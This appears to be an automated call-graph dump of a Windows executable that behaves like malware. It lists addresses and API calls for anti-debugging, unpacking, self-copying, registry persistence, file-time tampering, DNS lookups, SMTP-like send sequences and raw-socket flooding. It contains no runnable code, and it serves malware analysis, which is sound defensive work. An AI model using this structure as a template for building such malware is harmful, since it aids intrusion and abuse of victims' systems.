5509->5511 5512 402ebe Sleep 5509->5512 5510->5509 5513 405ee8 128 API calls 5511->5513 5512->5509 5514 402f1d 5513->5514 5515->5506 5516->5508 5517 409fc9 5518 409fd0 5517->5518 5519 409f00 strcmp 5518->5519 5520 409fff 5519->5520 5521 4094a0 strcmp 5520->5521 5522 40a119 5520->5522 5521->5520 5272 40bf50 TlsAlloc 5273 40bf80 GetLastError 5272->5273 5274 40bf63 5272->5274 5275 401350 IsBadHugeReadPtr 5276 401372 HeapFree 5275->5276 5277 40138e 5275->5277 5276->5277 5523 409fd0 5524 409f00 strcmp 5523->5524 5527 409fff 5524->5527 5525 40a119 5526 4094a0 strcmp 5526->5527 5527->5525 5527->5526 4289 40a858 4290 40a873 4289->4290 4291 40a864 4289->4291 4313 4090a0 4290->4313 4295 40bb20 4291->4295 4296 40bbb4 4295->4296 4297 40bb35 4295->4297 4360 40b0e0 4296->4360 4299 40bb40 4297->4299 4374 40b3b0 4297->4374 4300 40bbf0 GetLastError TlsGetValue SetLastError 4299->4300 4301 40bb4b 4299->4301 4300->4301 4303 40bc20 TlsSetValue 4300->4303 4306 40bb65 4301->4306 4342 40b6b0 4301->4342 4304 40bc3b GetLastError 4303->4304 4312 40bb89 4303->4312 4304->4312 4307 40bb6e 4306->4307 4308 40bc6f abort 4306->4308 4309 40bb7e 4307->4309 4310 40b0e0 10 API calls 4307->4310 4311 40b3b0 4 API calls 4309->4311 4309->4312 4310->4309 4311->4312 4312->4303 4385 40b460 4313->4385 4317 40915f 4319 40abd0 66 API calls 4317->4319 4318 4090e6 4318->4317 4412 40ace0 4318->4412 4321 40916e 4319->4321 4420 40a900 4321->4420 4322 40913e 4324 40ace0 66 API calls 4322->4324 4326 40914a 4324->4326 4328 40bb20 26 API calls 4326->4328 4328->4317 4329 409198 4433 408b00 4329->4433 4332 40920a 4459 40a580 4332->4459 4334 408b00 2 API calls 4336 4091da 4334->4336 4335 40920f 4465 40a3d0 4335->4465 4336->4335 4437 40a600 4336->4437 4344 40b6c1 4342->4344 4343 40b71f 4343->4306 4344->4343 4345 40b72c abort 4344->4345 4346 40b740 4345->4346 4347 40b759 4346->4347 4349 40b0e0 10 API calls 4346->4349 4348 40b764 4347->4348 4350 40b3b0 4 API calls 4347->4350 4351 40b7f0 GetLastError TlsGetValue SetLastError 4348->4351 4352 40b76f 4348->4352 4349->4347 4350->4348 4351->4352 4353 40b7d6 4352->4353 4354 40b6b0 14 API calls 4352->4354 4353->4306 4355 40b85c 4354->4355 4355->4353 4356 40b0e0 10 API calls 4355->4356 4357 40b89f TlsSetValue 4355->4357 4358 40b3b0 4 API calls 4355->4358 4356->4355 4357->4355 4359 40b8b6 GetLastError 4357->4359 4358->4355 4359->4355 4361 40b0f6 4360->4361 4362 40b0fe FindAtomA 4360->4362 4361->4297 4363 40b1a1 malloc 4362->4363 4364 40b2dc 4362->4364 4366 40b310 abort 4363->4366 4367 40b1b7 AddAtomA 4363->4367 4365 40b040 4 API calls 4364->4365 4368 40b2e1 4365->4368 4370 40b301 4367->4370 4371 40b2bf 4367->4371 4368->4297 4372 40b040 4 API calls 4370->4372 4371->4368 4373 40b2c5 ??3@YAXPAX FindAtomA 4371->4373 4372->4371 4373->4364 4375 40b3ce 4374->4375 4376 40b3d2 4374->4376 4375->4376 4377 40b409 InterlockedIncrement 4375->4377 4376->4299 4378 40b41b 4377->4378 4379 40b44e 4377->4379 4378->4376 4381 40b430 Sleep 4378->4381 4382 40b350 TlsAlloc 4379->4382 4381->4376 4381->4381 4383 40b390 GetLastError 4382->4383 4384 40b368 4382->4384 4383->4376 4384->4376 4386 40b4a0 4385->4386 4387 40b47c 4385->4387 4389 40b0e0 10 API calls 4386->4389 4388 40b483 4387->4388 4391 40b3b0 4 API calls 4387->4391 4390 40b4e0 GetLastError TlsGetValue SetLastError TlsSetValue 4388->4390 4392 4090db 4388->4392 4389->4387 4390->4392 4391->4388 4393 40abd0 4392->4393 4394 40b460 18 API calls 4393->4394 4395 40ac08 4394->4395 4474 40a9d0 4395->4474 4398 40ac2e 4399 40ac32 4398->4399 4400 40ac9b 4398->4400 4488 40b540 4399->4488 4496 40a430 4400->4496 4403 40ac56 4407 40b540 15 API calls 4403->4407 4410 40ac7e 4407->4410 4410->4318 4413 40a900 21 API calls 4412->4413 4414 40acf1 4413->4414 4415 40ad1e 4414->4415 4416 40a430 66 API calls 4414->4416 4415->4322 4417 40ad6c 4416->4417 4418 40a9d0 66 API calls 4417->4418 4419 40ad7b 4418->4419 4419->4322 4421 40b460 18 API calls 4420->4421 4422 40a938 4421->4422 4423 40a949 4422->4423 4425 40a97a TlsGetValue SetLastError 4422->4425 4424 40b540 15 API calls 4423->4424 4426 409173 4424->4426 4425->4423 4427 408940 4426->4427 4428 408956 4427->4428 4430 408992 4428->4430 4502 408730 4428->4502 4430->4329 4431 408981 4506 408870 4431->4506 4434 408b20 4433->4434 4435 408b48 4434->4435 4511 408a10 4434->4511 4435->4332 4435->4334 4438 40b460 18 API calls 4437->4438 4439 40a638 malloc 4438->4439 4440 40a690 4439->4440 4441 40a64e memset 4439->4441 4446 40a699 4440->4446 4517 40bed0 4440->4517 4442 40b540 15 API calls 4441->4442 4444 4091ea 4442->4444 4450 40a510 4444->4450 4446->4441 4448 40a430 64 API calls 4446->4448 4527 40c0e0 InterlockedDecrement 4446->4527 4448->4446 4451 40a9d0 66 API calls 4450->4451 4452 40a55a 4451->4452 4530 40b740 4452->4530 4455 40abd0 66 API calls 4456 40a56d 4455->4456 4457 40a430 66 API calls 4456->4457 4458 40a572 4457->4458 4460 40a9d0 66 API calls 4459->4460 4461 40a591 4460->4461 4462 40a430 66 API calls 4461->4462 4464 40abd0 66 API calls 4461->4464 4545 40bc80 4461->4545 4462->4461 4464->4461 4466 40b460 18 API calls 4465->4466 4467 40a408 abort 4466->4467 4469 40abd0 64 API calls 4467->4469 4470 40a425 abort 4469->4470 4471 40a430 4470->4471 4472 40a3d0 64 API calls 4471->4472 4473 40a445 4472->4473 4475 40b460 18 API calls 4474->4475 4478 40aa08 4475->4478 4476 40b540 15 API calls 4477 40aa7b 4476->4477 4477->4398 4477->4403 4480 40ab0a InterlockedIncrement 4478->4480 4484 40aa1e 4478->4484 4487 40aa66 4478->4487 4479 40aa34 TlsGetValue SetLastError 4481 40ab53 malloc 4479->4481 4479->4487 4480->4484 4483 40ab66 TlsSetValue 4481->4483 4481->4484 4483->4484 4485 40abba GetLastError 4483->4485 4484->4479 4486 40a430 60 API calls 4484->4486 4484->4487 4499 40a8b0 TlsAlloc 4484->4499 4485->4484 4486->4484 4487->4476 4489 40b570 4488->4489 4492 40b555 4488->4492 4490 40b0e0 10 API calls 4489->4490 4490->4492 4491 40b5b0 TlsSetValue 4495 40ac46 4491->4495 4493 40b3b0 4 API calls 4492->4493 4494 40b55c 4492->4494 4493->4494 4494->4491 4494->4495 4495->4318 4497 40a3d0 66 API calls 4496->4497 4498 40a445 4497->4498 4500 40a8c1 4499->4500 4501 40a8e6 GetLastError 4499->4501 4500->4484 4501->4484 4503 40873c 4502->4503 4505 40876e 4502->4505 4504 408760 abort 4503->4504 4503->4505 4504->4503 4505->4431 4507 4088d0 4506->4507 4508 408889 4506->4508 4507->4430 4509 4088f7 abort 4508->4509 4510 4088a0 4508->4510 4509->4510 4510->4430 4514 408a24 4511->4514 4516 408a57 4511->4516 4512 408870 abort 4513 408a79 4512->4513 4513->4434 4515 408a3e abort 4514->4515 4514->4516 4515->4514 4516->4512 4518 40bef3 4517->4518 4521 40a71c 4517->4521 4519 40bf04 InterlockedIncrement 4518->4519 4518->4521 4520 40bf16 4519->4520 4519->4521 4520->4521 4522 40bf20 Sleep 4520->4522 4521->4446 4523 40c080 InterlockedIncrement 4521->4523 4522->4521 4522->4522 4524 40c0a0 WaitForSingleObject 4523->4524 4525 40c099 4523->4525 4524->4525 4526 40c0bc InterlockedDecrement 4524->4526 4525->4446 4526->4446 4528 40c120 4527->4528 4529 40c0fb ReleaseSemaphore 4527->4529 4528->4446 4529->4528 4531 40b759 4530->4531 4532 40b81c 4530->4532 4533 40b764 4531->4533 4535 40b3b0 4 API calls 4531->4535 4534 40b0e0 10 API calls 4532->4534 4536 40b7f0 GetLastError TlsGetValue SetLastError 4533->4536 4538 40b76f 4533->4538 4534->4531 4535->4533 4536->4538 4537 40a565 4537->4455 4538->4537 4539 40b6b0 20 API calls 4538->4539 4540 40b85c 4539->4540 4540->4537 4541 40b0e0 10 API calls 4540->4541 4542 40b89f TlsSetValue 4540->4542 4543 40b3b0 4 API calls 4540->4543 4541->4540 4542->4540 4544 40b8b6 GetLastError 4542->4544 4543->4540 4544->4540 4546 40bd12 4545->4546 4549 40bc99 4545->4549 4547 40b740 25 API calls 4546->4547 4548 40bd1a 4547->4548 4548->4461 4550 40bd27 GetLastError TlsGetValue SetLastError 4549->4550 4551 40bd9f abort 4549->4551 4552 40b0e0 10 API calls 4549->4552 4553 40bd53 TlsSetValue 4549->4553 4554 40b3b0 TlsAlloc GetLastError InterlockedIncrement Sleep 4549->4554 4550->4549 4552->4549 4553->4549 4555 40bd6a GetLastError 4553->4555 4554->4549 4555->4549 4556 40285d lstrcat lstrcat 4567 404eae GetTickCount srand rand 4556->4567 4558 40289f lstrcat 4568 404eae GetTickCount srand rand 4558->4568 4560 4028c7 lstrcat 4561 402ecd 4560->4561 4562 404f0a 3 API calls 4561->4562 4563 402ed6 4561->4563 4564 402ebe Sleep 4561->4564 4562->4561 4569 405ee8 4563->4569 4564->4561 4567->4558 4568->4560 4570 40b460 18 API calls 4569->4570 4571 405f1a strchr GetProcessHeap 4570->4571 4586 409250 4571->4586 4573 405f4c 4598 4060aa DnsQuery_A 4573->4598 4575 405fac 4576 406020 4575->4576 4605 40619a memset GetSystemTime wsprintfA socket 4575->4605 4577 406092 4576->4577 4579 406030 GetProcessHeap HeapFree 4576->4579 4580 40606f 4576->4580 4581 40b540 15 API calls 4577->4581 4579->4579 4579->4580 4580->4577 4688 401394 IsBadHugeReadPtr 4580->4688 4582 402f1d 4581->4582 4587 40b460 18 API calls 4586->4587 4588 409288 4587->4588 4589 4092a3 malloc 4588->4589 4592 40931f 4588->4592 4589->4588 4590 4092d0 4589->4590 4591 40b540 15 API calls 4590->4591 4593 4092db 4591->4593 4594 40a600 66 API calls 4592->4594 4593->4573 4595 40932b 4594->4595 4596 40a510 66 API calls 4595->4596 4597 409352 4596->4597 4599 40618f 4598->4599 4604 4060fc 4598->4604 4599->4575 4600 40617c GlobalFree 4600->4599 4601 40610a GetProcessHeap RtlAllocateHeap 4602 406130 lstrcpy 4601->4602 4601->4604 4694 4013d8 4602->4694 4604->4600 4604->4601 4606 4062ec htons inet_addr 4605->4606 4607 40672e closesocket 4605->4607 4608 40633b connect 4606->4608 4609 40631b gethostbyname 4606->4609 4610 40673e 4607->4610 4608->4607 4612 40635e 4608->4612 4609->4607 4611 406331 4609->4611 4610->4575 4611->4608 4702 4067e0 memset recv 4612->4702 4615 40636e wsprintfA 4706 406788 lstrlen send 4615->4706 4618 40639f wsprintfA 4619 406788 6 API calls 4618->4619 4620 4063c2 4619->4620 4620->4607 4621 4063ca wsprintfA 4620->4621 4622 406788 6 API calls 4621->4622 4623 4063ed 4622->4623 4623->4607 4624 406788 6 API calls 4623->4624 4625 406405 4624->4625 4625->4607 4626 40640d wsprintfA 4625->4626 4710 406746 lstrlen send 4626->4710 4628 406430 4628->4607 4629 406438 wsprintfA 4628->4629 4711 406746 lstrlen send 4629->4711 4631 40645b 4631->4607 4632 406463 wsprintfA 4631->4632 4712 406746 lstrlen send 4632->4712 4634 406489 4634->4607 4713 406746 lstrlen send 4634->4713 4636 4064a1 4636->4607 4637 4064a9 wsprintfA 4636->4637 4714 406746 lstrlen send 4637->4714 4639 4064cc 4639->4607 4715 406746 lstrlen send 4639->4715 4641 4064e4 4641->4607 4642 4064ec lstrlen 4641->4642 4643 406502 4642->4643 4644 40669f 4642->4644 4716 406746 lstrlen send 4643->4716 4737 406746 lstrlen send 4644->4737 4647 406512 4647->4607 4717 406746 lstrlen send 4647->4717 4648 4066af 4648->4607 4738 406746 lstrlen send 4648->4738 4651 40652a 4651->4607 4655 406552 4651->4655 4656 406538 4651->4656 4652 4066c3 4652->4607 4653 4066c7 wsprintfA 4652->4653 4739 406746 lstrlen send 4653->4739 4719 406746 lstrlen send 4655->4719 4718 406746 lstrlen send 4656->4718 4657 406695 4657->4607 4661 406788 6 API calls 4657->4661 4660 406548 4660->4607 4720 406746 lstrlen send 4660->4720 4662 406704 4661->4662 4662->4607 4666 406788 6 API calls 4662->4666 4664 40657a 4664->4607 4665 406582 wsprintfA 4664->4665 4721 406746 lstrlen send 4665->4721 4668 406718 4666->4668 4668->4607 4670 40671c closesocket 4668->4670 4669 4065ab 4669->4607 4722 406746 lstrlen send 4669->4722 4670->4610 4672 4065c3 4672->4607 4673 4065cb wsprintfA 4672->4673 4723 406746 lstrlen send 4673->4723 4675 4065ee 4675->4607 4676 4065f6 wsprintfA 4675->4676 4724 406746 lstrlen send 4676->4724 4678 406619 4678->4607 4725 406746 lstrlen send 4678->4725 4680 406631 4680->4607 4726 4017f8 CreateFileA 4680->4726 4684 406666 4685 40667a GlobalFree 4684->4685 4686 40666a GlobalFree 4684->4686 4736 406746 lstrlen send 4685->4736 4686->4607 4689 4013d2 4688->4689 4690 4013b6 HeapFree 4688->4690 4691 409230 4689->4691 4690->4689 4692 409245 4691->4692 4693 40923d ??3@YAXPAX 4691->4693 4692->4577 4693->4692 4695 4013f5 4694->4695 4696 401431 4695->4696 4697 4013fc HeapFree 4695->4697 4698 401436 RtlAllocateHeap 4696->4698 4701 401473 4696->4701 4699 401466 4697->4699 4698->4699 4699->4604 4700 40151f RtlReAllocateHeap 4700->4699 4701->4699 4701->4700 4703 406835 4702->4703 4704 406366 4702->4704 4740 406856 lstrlen 4703->4740 4704->4607 4704->4615 4707 4067c6 4706->4707 4709 406397 4706->4709 4708 4067e0 4 API calls 4707->4708 4708->4709 4709->4607 4709->4618 4710->4628 4711->4631 4712->4634 4713->4636 4714->4639 4715->4641 4716->4647 4717->4651 4718->4660 4719->4660 4720->4664 4721->4669 4722->4672 4723->4675 4724->4678 4725->4680 4727 401860 GetFileSize GetProcessHeap RtlAllocateHeap 4726->4727 4728 40198b 4726->4728 4729 4018b1 ReadFile 4727->4729 4730 40189c CloseHandle 4727->4730 4735 406746 lstrlen send 4728->4735 4731 4018dd GetProcessHeap HeapFree CloseHandle 4729->4731 4732 40190e GlobalAlloc 4729->4732 4730->4728 4731->4728 4743 401996 4732->4743 4735->4684 4736->4657 4737->4648 4738->4652 4739->4657 4741 406896 4740->4741 4742 40687c sscanf 4740->4742 4741->4704 4742->4741 4744 4019be 4743->4744 4746 40195a GetProcessHeap HeapFree CloseHandle 4743->4746 4745 4019e3 SetLastError 4744->4745 4744->4746 4745->4746 4746->4728 4747 409660 4750 4094a0 4747->4750 4751 4094b3 strcmp 4750->4751 4752 4094c9 4750->4752 4751->4752 3835 40b0e0 3836 40b0f6 3835->3836 3837 40b0fe FindAtomA 3835->3837 3838 40b1a1 malloc 3837->3838 3839 40b2dc 3837->3839 3841 40b310 abort 3838->3841 3842 40b1b7 AddAtomA 3838->3842 3849 40b040 GetAtomNameA 3839->3849 3845 40b301 3842->3845 3846 40b2bf 3842->3846 3843 40b2e1 3847 40b040 4 API calls 3845->3847 3846->3843 3848 40b2c5 ??3@YAXPAX FindAtomA 3846->3848 3847->3846 3848->3839 3850 40b076 3849->3850 3851 40b090 3850->3851 3853 40c130 fprintf fflush abort 3850->3853 3851->3843 4927 4012e0 4928 40b0e0 4927->4928 4929 40b0f6 4928->4929 4930 40b0fe FindAtomA 4928->4930 4931 40b1a1 malloc 4930->4931 4932 40b2dc 4930->4932 4934 40b310 abort 4931->4934 4935 40b1b7 AddAtomA 4931->4935 4933 40b040 4 API calls 4932->4933 4936 40b2e1 4933->4936 4938 40b301 4935->4938 4939 40b2bf 4935->4939 4940 40b040 4 API calls 4938->4940 4939->4936 4941 40b2c5 ??3@YAXPAX FindAtomA 4939->4941 4940->4939 4941->4932 5282 409760 5283 4097b3 5282->5283 5284 409788 5282->5284 5285 4094a0 strcmp 5283->5285 5285->5284 5286 408b60 5287 40b460 18 API calls 5286->5287 5289 408b95 5287->5289 5288 40b540 15 API calls 5313 408c3c 5288->5313 5293 408940 2 API calls 5289->5293 5289->5313 5290 409011 5294 40a430 66 API calls 5290->5294 5291 40905c 5295 40abd0 66 API calls 5291->5295 5292 40901d 5300 409085 5292->5300 5302 40ace0 66 API calls 5292->5302 5296 408c28 5293->5296 5294->5292 5297 40906d 5295->5297 5299 408730 abort 5296->5299 5301 40a3d0 66 API calls 5297->5301 5298 408940 2 API calls 5298->5313 5299->5313 5303 40abd0 66 API calls 5300->5303 5301->5300 5305 409047 5302->5305 5306 409093 5303->5306 5304 408730 abort 5304->5313 5307 40bb20 26 API calls 5305->5307 5308 40a430 66 API calls 5306->5308 5307->5291 5309 40909f 5308->5309 5310 408ca7 5311 40b540 15 API calls 5310->5311 5312 408d08 5311->5312 5313->5288 5313->5290 5313->5291 5313->5292 5313->5298 5313->5304 5313->5310 5314 408a10 2 API calls 5313->5314 5315 408b00 2 API calls 5313->5315 5314->5313 5315->5313 5316 40a760 5317 40a77b 5316->5317 5318 40a76c 5316->5318 5320 4090a0 66 API calls 5317->5320 5319 40bb20 26 API calls 5318->5319 5319->5317 5321 40a78a 5320->5321 5322 40b460 18 API calls 5321->5322 5325 40a7c8 5322->5325 5323 40a820 ??3@YAXPAX 5324 40a82b 5323->5324 5327 40b540 15 API calls 5324->5327 5325->5323 5326 40a7ed 5325->5326 5328 40c080 3 API calls 5325->5328 5326->5324 5330 40c0e0 2 API calls 5326->5330 5329 40a836 5327->5329 5328->5326 5331 40a81a 5330->5331 5331->5323 5331->5324 5536 40a5e0 5539 40c040 CreateSemaphoreA 5536->5539 5538 40a5f2 5539->5538 5540 40bde0 5541 40bdf8 5540->5541 5542 40be59 5540->5542 5544 40bdff 5541->5544 5545 40b3b0 4 API calls 5541->5545 5543 40b0e0 10 API calls 5542->5543 5543->5541 5546 40be7b GetLastError TlsGetValue SetLastError 5544->5546 5547 40be06 5544->5547 5545->5544 5546->5547 4942 4028e2 lstrcat lstrcat lstrcat 4944 402ecd 4942->4944 4943 404f0a 3 API calls 4943->4944 4944->4943 4945 402ed6 4944->4945 4946 402ebe Sleep 4944->4946 4947 405ee8 128 API calls 4945->4947 4946->4944 4948 402f1d 4947->4948 5332 405f6a 5333 409230 ??3@YAXPAX 5332->5333 5334 405f7e 5333->5334 5335 405f90 5334->5335 5336 40bb20 26 API calls 5334->5336 5337 4060aa 8 API calls 5335->5337 5336->5335 5343 405fac 5337->5343 5338 406020 5339 406092 5338->5339 5341 406030 GetProcessHeap HeapFree 5338->5341 5344 40606f 5338->5344 5342 40b540 15 API calls 5339->5342 5340 40619a 46 API calls 5340->5343 5341->5341 5341->5344 5345 40609d 5342->5345 5343->5338 5343->5340 5344->5339 5346 401394 2 API calls 5344->5346 5347 406087 5346->5347 5348 409230 ??3@YAXPAX 5347->5348 5348->5339 5548 406bea inet_addr WSASocketA 5549 406c92 setsockopt 5548->5549 5558 406d01 5548->5558 5550 406ccd GetProcessHeap RtlAllocateHeap 5549->5550 5549->5558 5551 406cff memset GetCurrentProcessId 5550->5551 5550->5558 5553 406d52 GetTickCount Sleep 5551->5553 5554 406d9e GetTickCount 5551->5554 5553->5553 5553->5554 5559 406ba4 5554->5559 5557 406e00 Sleep 5557->5554 5560 406bb7 sendto 5559->5560 5560->5557 5560->5558 4949 4092ec 4950 40930b 4949->4950 4951 4092fc 4949->4951 4953 40931f 4950->4953 4954 4090a0 66 API calls 4950->4954 4952 40bb20 26 API calls 4951->4952 4952->4950 4955 40a600 66 API calls 4953->4955 4954->4953 4956 40932b 4955->4956 4957 40a510 66 API calls 4956->4957 4958 409352 4957->4958 5349 40156c 5350 401648 5349->5350 5351 40158a 5349->5351 5352 401621 HeapFree 5351->5352 5353 40159b RtlAllocateHeap 5351->5353 5352->5350 5353->5350 5354 4015ca 5353->5354 5354->5352 5355 40b56c 5356 40b570 5355->5356 5357 40b0e0 10 API calls 5356->5357 5358 40b575 5357->5358 5361 40b3b0 4 API calls 5358->5361 5362 40b55c 5358->5362 5359 40b5b0 TlsSetValue 5360 40b563 5359->5360 5361->5362 5362->5359 5362->5360 4959 40aaee 4960 40aaf0 4959->4960 4961 4090a0 66 API calls 4960->4961 4971 40aa1e 4961->4971 4962 40aa66 4963 40b540 15 API calls 4962->4963 4964 40aa7b 4963->4964 4965 40aa34 TlsGetValue SetLastError 4965->4962 4966 40ab53 malloc 4965->4966 4967 40ab66 TlsSetValue 4966->4967 4966->4971 4968 40abba GetLastError 4967->4968 4967->4971 4968->4971 4969 40a430 66 API calls 4969->4971 4970 40a8b0 2 API calls 4970->4971 4971->4962 4971->4965 4971->4969 4971->4970 4263 436cf0 4264 436d00 4263->4264 4265 436e3a VirtualProtect VirtualProtect 4264->4265 4266 436dfe LoadLibraryA 4264->4266 4267 436e6e 4265->4267 4268 436e15 4266->4268 4267->4267 4268->4264 4269 436e1c GetProcAddress 4268->4269 4269->4268 4270 436e34 ExitProcess 4269->4270 4770 403e78 4771 404c38 4770->4771 4772 403ea2 RegOpenKeyExA 4771->4772 4773 403ed3 RegSetValueExA RegCloseKey 4772->4773 4774 403f1f 4772->4774 4773->4774 5363 401778 5364 401797 5363->5364 5366 4017b5 5363->5366 5367 40165a 5364->5367 5368 401671 5367->5368 5369 401699 5367->5369 5370 4013d8 3 API calls 5368->5370 5371 4013d8 3 API calls 5369->5371 5374 401687 5370->5374 5372 4016b8 5371->5372 5373 4016c5 memmove 5372->5373 5372->5374 5373->5374 5374->5366 5374->5374 4972 4094f9 4973 409500 4972->4973 4974 4094a0 strcmp 4973->4974 4975 409518 4974->4975 5375 40bf79 5376 40bf80 GetLastError 5375->5376 4980 40a6fc 4981 40a700 4980->4981 4982 40bed0 2 API calls 4981->4982 4983 40a71c 4982->4983 4984 40c080 3 API calls 4983->4984 4985 40a699 4983->4985 4984->4985 4986 40a64e memset 4985->4986 4987 40c0e0 2 API calls 4985->4987 4988 40a430 66 API calls 4985->4988 4989 40b540 15 API calls 4986->4989 4987->4985 4988->4985 4990 40a67c 4989->4990 4991 4098fe 4992 409900 4991->4992 4993 4094a0 strcmp 4992->4993 4995 4098cd 4993->4995 4994 4098dc 4995->4994 4996 4094a0 strcmp 4995->4996 4996->4994 3854 401280 __set_app_type 3859 401150 SetUnhandledExceptionFilter 3854->3859 3856 401298 __set_app_type 3857 401150 274 API calls 3856->3857 3858 4012b8 3857->3858 3860 40116b 3859->3860 3861 401170 __getmainargs 3860->3861 3862 401210 __p__fmode 3861->3862 3866 4011ac 3861->3866 3862->3866 3863 401260 _setmode 3863->3866 3864 4011c4 _setmode 3864->3866 3865 4011e8 _setmode 3865->3862 3866->3862 3866->3863 3866->3864 3866->3865 3867 40122a __p__environ 3866->3867 3870 404076 3867->3870 3869 40124b _cexit ExitProcess 3869->3863 3871 40408f 3870->3871 3872 404094 WSAStartup 3871->3872 3942 404ab8 IsDebuggerPresent 3872->3942 3875 4040c2 3944 4049ea 3875->3944 3876 4040b6 ExitProcess 3879 4040d7 3950 404620 memset GetSystemDirectoryA lstrlen 3879->3950 3880 4040cb ExitProcess 3882 40410d 3883 404620 5 API calls 3882->3883 3884 40413d 3883->3884 3953 403f24 3884->3953 3889 404150 3967 405dc4 3889->3967 3890 4041c5 4032 403e2e 3890->4032 3894 4041ca 3895 4041bb 3894->3895 4035 404ed6 fopen 3894->4035 3895->3869 3902 4041e9 3906 405dc4 58 API calls 3902->3906 3903 40423e 3904 404242 LoadLibraryA 3903->3904 3911 404253 3903->3911 3904->3911 3908 4041ee 3906->3908 3910 405d46 4 API calls 3908->3910 3913 4041f6 3910->3913 4038 404812 RegOpenKeyExA 3911->4038 3915 403c44 39 API calls 3913->3915 3918 4041fb 3915->3918 3921 4056d0 55 API calls 3918->3921 3920 4041ab 4028 405776 memset CreateProcessA 3920->4028 3924 404200 3921->3924 3922 404296 CreateThread 3923 4042cf 3922->3923 4123 403ae0 3922->4123 4042 404df4 GetCurrentProcess OpenProcessToken 3923->4042 3927 4054f2 42 API calls 3924->3927 3929 404208 3927->3929 3931 40435c 6 API calls 3929->3931 3933 40421a LoadLibraryA Sleep 3931->3933 3932 4042ef 3934 4042f3 LoadLibraryA 3932->3934 3935 404304 3932->3935 3933->3895 3934->3935 3936 404812 4 API calls 3935->3936 3937 40432c 3936->3937 3938 40433c 3937->3938 4050 406a0a CreateThread 3937->4050 4051 407c4e 3938->4051 3941 404341 Sleep 3941->3941 3943 4040b2 3942->3943 3943->3875 3943->3876 3949 404a65 3944->3949 3946 4040c7 3946->3879 3946->3880 3947 404a88 CharLowerA 4065 404990 3947->4065 3949->3946 3949->3947 4061 404748 RegOpenKeyExA 3949->4061 3951 404663 lstrcat 3950->3951 3952 404676 lstrcat 3950->3952 3951->3952 3952->3882 4069 404c38 3953->4069 3955 403f48 RegOpenKeyExA 3956 403f79 RegCreateKeyExA 3955->3956 3957 403fcf lstrlen RegSetValueExA RegCloseKey 3955->3957 3956->3957 3958 404022 3956->3958 3957->3958 3959 403d26 3958->3959 3961 403d46 3959->3961 3960 403d48 RegOpenKeyExA 3960->3961 3962 403d87 RegCloseKey 3960->3962 3961->3960 3965 403da9 3961->3965 3966 403e24 3962->3966 3963 403dab RegCreateKeyExA 3964 403e0c RegCloseKey 3963->3964 3963->3965 3964->3965 3965->3963 3965->3966 3966->3889 3966->3890 3968 405de5 3967->3968 3969 404620 5 API calls 3968->3969 3970 405dff 3969->3970 3971 405e2b CreateFileA 3970->3971 3972 405e83 3971->3972 3973 405e77 ExitProcess 3971->3973 4071 405c6c 3972->4071 3976 4054f2 42 API calls 3977 405eb4 3976->3977 3978 404620 5 API calls 3977->3978 3979 405ed2 3978->3979 3980 40435c 6 API calls 3979->3980 3981 404155 3980->3981 3982 405d46 CreateFileA 3981->3982 3983 405d9c 3982->3983 3984 40415d 3982->3984 3985 405c6c 2 API calls 3983->3985 3987 403c44 3984->3987 3986 405db4 CloseHandle 3985->3986 3986->3984 3988 403c6c 3987->3988 4077 404f82 6 API calls 3988->4077 3992 403ca0 4097 4048e2 RegOpenKeyExA 3992->4097 3994 403cc4 3995 4048e2 4 API calls 3994->3995 3996 403ce8 3995->3996 3997 404690 5 API calls 3996->3997 3998 403d00 3997->3998 3999 404690 5 API calls 3998->3999 4000 403d18 3999->4000 4001 4056d0 GetModuleFileNameA 4000->4001 4002 405712 4001->4002 4003 404620 5 API calls 4002->4003 4004 40572c CopyFileA 4003->4004 4005 4054f2 42 API calls 4004->4005 4006 40574b 4005->4006 4007 404620 5 API calls 4006->4007 4008 405763 4007->4008 4009 40435c 6 API calls 4008->4009 4010 404167 4009->4010 4011 4054f2 CreateFileA 4010->4011 4012 40416f 4011->4012 4013 40554e 4011->4013 4022 40435c CreateFileA 4012->4022 4014 404f82 30 API calls 4013->4014 4015 405559 SetFilePointer WriteFile Sleep 4014->4015 4016 404f82 30 API calls 4015->4016 4017 4055b9 SetFilePointer WriteFile Sleep 4016->4017 4018 404f82 30 API calls 4017->4018 4019 405619 SetFilePointer WriteFile SetFilePointer 4018->4019 4020 40568d WriteFile 4019->4020 4020->4020 4021 4056bd CloseHandle 4020->4021 4021->4012 4023 404181 LoadLibraryA Sleep 4022->4023 4024 4043bb GetFileTime 4022->4024 4023->3920 4024->4023 4025 4043e2 CloseHandle CreateFileA 4024->4025 4025->4023 4026 404441 SetFileTime 4025->4026 4026->4023 4027 404464 CloseHandle 4026->4027 4027->4023 4029 405841 4028->4029 4030 405809 4028->4030 4029->3895 4030->4029 4031 40580f WaitForSingleObject CloseHandle CloseHandle 4030->4031 4031->4029 4033 404c38 4032->4033 4034 403e48 CreateMutexA GetLastError 4033->4034 4034->3894 4036 4041e5 4035->4036 4037 404ef8 fclose 4035->4037 4036->3902 4036->3903 4037->4036 4039 404858 RegOpenKeyExA 4038->4039 4040 40488b RegQueryValueExA RegCloseKey 4038->4040 4039->4040 4041 40428b 4039->4041 4040->4041 4041->3922 4041->3923 4043 404e21 LookupPrivilegeValueA 4042->4043 4044 4042db Sleep 4042->4044 4045 404e42 AdjustTokenPrivileges 4043->4045 4046 404e98 CloseHandle 4043->4046 4047 40402c 4044->4047 4045->4044 4046->4044 4048 404c38 4047->4048 4049 404046 CreateMutexA GetLastError 4048->4049 4049->3932 4050->3938 4052 407cc7 4051->4052 4101 404ce6 4052->4101 4056 401c2c 47 API calls 4057 407e39 4056->4057 4057->4056 4058 408013 CreateThread 4057->4058 4060 407f81 4057->4060 4105 402120 4057->4105 4058->3941 4060->4057 4122 404eae GetTickCount srand rand 4060->4122 4062 4047c0 RegQueryValueExA RegCloseKey 4061->4062 4063 40478d RegOpenKeyExA 4061->4063 4064 40480a 4062->4064 4063->4062 4063->4064 4064->3949 4066 4049bc strstr 4065->4066 4067 4049d7 4066->4067 4068 4049d0 4066->4068 4067->4066 4067->4068 4068->3949 4070 404c4b 4069->4070 4070->3955 4072 405c90 4071->4072 4073 405d0b 4071->4073 4072->4073 4074 405c98 WriteFile 4072->4074 4075 405d3d CloseHandle 4073->4075 4076 405d0f WriteFile 4073->4076 4074->4072 4075->3976 4076->4075 4078 405019 4077->4078 4079 40500d rand 4077->4079 4080 405026 GetTickCount srand rand 4078->4080 4081 40503f 4078->4081 4079->4078 4080->4081 4082 405067 4081->4082 4083 40504e GetTickCount srand rand 4081->4083 4084 405076 GetTickCount srand rand 4082->4084 4085 40508f 4082->4085 4083->4082 4084->4085 4086 4050b7 